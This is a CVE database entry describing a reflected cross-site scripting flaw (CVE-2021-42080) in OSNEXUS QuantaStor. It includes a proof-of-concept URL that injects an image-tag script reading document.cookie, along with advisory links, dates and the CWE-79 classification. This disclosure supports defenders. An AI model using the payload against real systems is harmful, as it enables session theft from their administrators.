An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
References
Link | Resource |
---|---|
https://csirt.divd.nl/CVE-2021-42080 | Third Party Advisory |
https://csirt.divd.nl/DIVD-2021-00020/ | |
https://www.osnexus.com/products/software-defined-storage | Product |
https://www.wbsec.nl/osnexus | Third Party Advisory |
https://csirt.divd.nl/CVE-2021-42080 | Third Party Advisory |
https://www.divd.nl/DIVD-2021-00020 | |
https://www.osnexus.com/products/software-defined-storage | Product |
https://www.wbsec.nl/osnexus | Third Party Advisory |
Configurations
History
22 Sep 2025, 07:15
Type | Values Removed | Values Added |
---|---|---|
Summary | (en) An attacker is able to launch a Reflected XSS attack using a crafted URL. POC: Visit the following URL https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)> |
Information
Published : 2023-07-10 16:15
Updated : 2025-09-22 07:15
NVD link : CVE-2021-42080
Mitre link : CVE-2021-42080
CVE.ORG link : CVE-2021-42080
JSON object : View
Products Affected
osnexus
- quantastor
CWE
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')